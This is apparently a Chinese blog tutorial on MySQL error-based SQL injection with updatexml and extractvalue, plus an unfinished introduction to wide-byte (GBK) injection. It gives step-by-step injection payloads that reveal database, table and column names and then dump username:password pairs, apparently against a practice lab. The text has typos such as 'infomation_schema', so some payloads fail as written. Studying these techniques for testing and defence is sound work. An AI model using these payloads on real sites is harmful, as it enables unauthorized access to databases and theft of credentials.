SQL报错注入

SQL注入报错注入

报错注入原理:报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的在遇到有报错回显的时候,但是没有数据回显的情况下可以利用报错注入的函数:

1.floor():向下取整

2.extractvalue(): 对XML文档进行查询的函数,当参数的格式不正确而

产生的错误,会返回参数的信息

3.updatexml(): 更新xml文档的函数,原理跟extracvalue一样

4.exp0:以e为底的指数函数

5.rand()+group()+count()

updatexml()

函数语法: updatexml(XML_document,XPath_string,new_value);

适用版本:5.1.5+

payload: updatexml(1,concat(0x7e,(select user()),0x7e),1)

前后添加~使其不符合xpath格式从而报错

复制代码
0x7e是~

extractvalue()

函数语法: EXTRACTVALUE(XML_document,XPath_string);

适用版本:5.1.5+

利用原理与updatexml函数相同

payload: and(extractvalue(1,concat(0x7e,(select user()),0x7e))

流程

1.利用爆破数据库名

and extractvalue(1,concat(0x7e,database(),0x7e)) --+

2.利用爆表名

and extractvalue(1,concat(0x7e,(select group_concat(table_name) from infomation_schema.tables where table_schema=database()),0x7e)) --+

3.利用爆列名

and extractvalue(1,concat(0x7e,(select group_concat(column_name) from infomation_schema.columns where table_name='users'),0x7e)) --+

但是可以发现没有全部显示列出来玩吗可以利用and column_name not in('id','login','password','email','secret')来显示其他的值,如果还是没有就全部显示出来就继续加到and 里面的值

and extractvalue(1,concat(0x7e,(select group_concat(column_name) from infomation_schema.columns where table_name='users' and column_name not in('id','login','password','email','secret')),0x7e)) --+

4.利用爆破值

and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e)) --+

同样的没有显示全利用where username not in('Dumb','Angelina')

and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in('Dumb','Angelina')),0x7e)) --+

SQL注入之宽字节注入

1.宽字节注入

原因:

1.现在大多数的网站对于SQL注入都做了一定的方法,例如使用一些Mysql中转义的函数addslashes,mysql_realescape_string,mysql_escape_string等,还有一种是配置magic_quote gpc,不过PHP高版本已经移除此功能。其实这些函数就是为了过滤用户输入的一些数据,对

特殊的字符加上反斜杠"\"进行转义。

2.网站开启了magic_quote gpc,或者使用了上面的转义函数数据库设置成gbk编码(不是html编码)

3.在编码中,gbk编码占用2个字符,ascll占用1个字符,攻击者恶意构造,把ascll字符吃掉,就能进行下一步攻击

相关推荐
在未来等你9 分钟前
SQL进阶之旅 Day 21:临时表与内存表应用
sql·mysql·postgresql·database·temporary-table·memory-table·sql-optimization
敖云岚42 分钟前
【Redis】分布式锁的介绍与演进之路
数据库·redis·分布式
zhuiQiuMX1 小时前
分享今天做的力扣SQL题
sql·算法·leetcode
LUCIAZZZ1 小时前
HikariCP数据库连接池原理解析
java·jvm·数据库·spring·springboot·线程池·连接池
我在北京coding1 小时前
300道GaussDB(WMS)题目及答案。
数据库·gaussdb
小Tomkk2 小时前
阿里云 RDS mysql 5.7 怎么 添加白名单 并链接数据库
数据库·mysql·阿里云
明月醉窗台3 小时前
qt使用笔记二:main.cpp详解
数据库·笔记·qt
沉到海底去吧Go3 小时前
【图片自动识别改名】识别图片中的文字并批量改名的工具,根据文字对图片批量改名,基于QT和腾讯OCR识别的实现方案
数据库·qt·ocr·图片识别自动改名·图片区域识别改名·pdf识别改名
老纪的技术唠嗑局3 小时前
重剑无锋,大巧不工 —— OceanBase 中的 Nest Loop Join 使用技巧分享
数据库·sql
BillKu4 小时前
Java + Spring Boot + Mybatis 插入数据后,获取自增 id 的方法
java·tomcat·mybatis